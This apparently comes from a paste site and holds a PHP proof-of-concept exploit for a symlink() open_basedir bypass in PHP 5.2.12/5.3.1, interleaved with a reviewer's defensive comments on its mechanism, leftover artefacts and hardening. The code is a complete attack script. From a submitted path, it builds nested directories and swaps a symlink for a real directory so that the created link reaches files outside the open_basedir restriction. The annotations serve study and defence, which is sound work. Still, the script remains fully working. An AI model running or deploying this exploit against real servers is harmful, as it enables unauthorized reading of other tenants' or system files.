TrojanSpot

Symlink open_basedir bypass | www.pemula.info

Sep 21st, 2012
  1. <?php
  2. /*
  3. PHP 5.2.12/5.3.1 symlink() open_basedir bypass
  4. by Maksymilian Arciemowicz http://securityreason.com/
  5. cxib [ a.T] securityreason [ d0t] com
  6.  
  7. CHUJWAMWMUZG
  8. */
  9.  
      /*
       * Reviewer notes (defensive reading of this proof of concept).
       *
       * What the script shows: the link target is built through a path
       * component named "fakesymlink". That component is a symlink while
       * symlink() is called and is replaced by a real directory afterwards, so
       * the relative target stored in "symlink<N>" resolves to a different
       * location later than it did when the link was created. The header
       * attributes this to the open_basedir handling of symlink() in
       * PHP 5.2.12/5.3.1; whether a given later release is affected has to be
       * checked against the vendor advisory.
       *
       * Artefacts left in the working directory (useful when triaging a host):
       *   - a chain of nested "cx" directories, $fakedep levels deep
       *   - a directory tree under the first "cx" that mirrors the requested path
       *   - a directory named "fakesymlink"
       *   - links named "symlink0", "symlink1", ... next to the script
       *
       * Hardening points:
       *   - open_basedir is a path filter, not an isolation boundary; separate
       *     tenants with OS-level users/containers instead of relying on it
       *   - list symlink (and link) in disable_functions where they are not needed
       *   - stop the web server from following links out of the document root
       *     (Apache: Options -FollowSymLinks or SymLinksIfOwnerMatch)
       *   - keep web-served directories non-writable for the PHP process; the
       *     script itself stops when "." is not writable
       */
      // Name of the directory that is nested to build the deep path.
  10. $fakedir="cx";
      // Number of nested $fakedir levels; also sets how many "../" steps the
      // link target contains ($fakedep-1).
  11. $fakedep=16;
  12.  
  13. $num=0; // offset of symlink.$num
  14.  
      // The requested path is taken from the query string first, then from the
      // POST body. It is used below as a filesystem path without validation.
  15. if(!empty($_GET['file'])) $file=$_GET['file'];
  16. else if(!empty($_POST['file'])) $file=$_POST['file'];
  17. else $file="";
  18.  
      // Banner and input form.
      // NOTE(review): HTTP_HOST is written into the form action without
      // htmlspecialchars(), unlike PHP_SELF and $file; the Host header is
      // client-supplied, so this output is unescaped request data.
      // NOTE(review): the <img> src looks mangled by a mirror; as written the
      // page references a remote image, so rendering it contacts a third-party
      // host - confirm before opening this file in a browser.
  19. echo '<PRE><img src=http://www.exploit-db.com/exploits/"http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a
  20. href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs.
  21. Author : Maksymilian Arciemowicz
  22. <p>Script for legal use only.
  23. <p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
  24. <p>More: <a href="http://securityreason.com/">SecurityReason</a>
  25. <p><form name="form"
  26. action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';
  27.  
      // Nothing requested: only the form is shown.
  28. if(empty($file))
  29.     exit;
  30.  
      // Everything below writes into the current directory, so a read-only
      // working directory stops the script here.
  31. if(!is_writable("."))
  32.     die("not writable directory");
  33.  
      // $level is not read anywhere in the visible script.
  34. $level=0;
  35.  
      // Create $fakedir inside itself $fakedep times, descending one level per
      // iteration. mkdir()/chdir() results are not checked.
  36. for($as=0;$as<$fakedep;$as++){
  37.     if(!file_exists($fakedir))
  38.         mkdir($fakedir);
  39.     chdir($fakedir);
  40. }
  41.  
      // $as equals $fakedep here. The condition is tested before the decrement,
      // so this climbs $fakedep-1 levels and leaves the working directory in the
      // first $fakedir level, with $as ending at 0.
  42. while(1<$as--) chdir("..");
  43.  
      // Split the requested path into segments.
  44. $hardstyle = explode("/", $file);
  45.  
      // Recreate every non-empty segment (the final name included) as a
      // directory below the first $fakedir level, so the requested path exists
      // inside the writable tree. $as counts the levels descended.
      // empty() also skips a segment that is the string "0".
  46. for($a=0;$a<count($hardstyle);$a++){
  47.     if(!empty($hardstyle[$a])){
  48.         if(!file_exists($hardstyle[$a]))
  49.             mkdir($hardstyle[$a]);
  50.         chdir($hardstyle[$a]);
  51.         $as++;
  52.     }
  53. }
      // One extra step for the $fakedir level, then climb back to the directory
      // the script started in.
  54. $as++;
  55. while($as--)
  56.     chdir("..");
  57.  
      // Clear a leftover "fakesymlink" from an earlier run, whether it is a
      // directory or a link. "@" hides the error from whichever call does not apply.
  58. @rmdir("fakesymlink");
  59. @unlink("fakesymlink");
  60.  
      // First state of "fakesymlink": a link to the deepest $fakedir level.
  61. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  62.  
  63. // this loop skips symlink names that already exist.
      // The target goes through "fakesymlink" and then up $fakedep-1 levels,
      // which at this moment lands in the first $fakedir level, where the
      // mirrored path was created above.
      // NOTE(review): the loop has no upper bound. If symlink() fails for a
      // reason other than an existing name (for example when the function is
      // disabled), it presumably spins until the execution time limit - verify.
  64. while(1)
  65.     if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
  66.     else $num++;
  67.  
      // Second state of "fakesymlink": the link is removed and a real directory
      // takes its place. The "../" steps stored in "symlink<N>" are now counted
      // from this directory instead of from the deep $fakedir level, so the
      // stored target no longer points at the mirrored tree.
  68. @unlink("fakesymlink");
  69. mkdir("fakesymlink");
  70.  
      // Print a link to the created "symlink<N>" and stop. Whether the web
      // server serves it depends on its symlink-following configuration.
  71. die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
  72.  
  73. ?>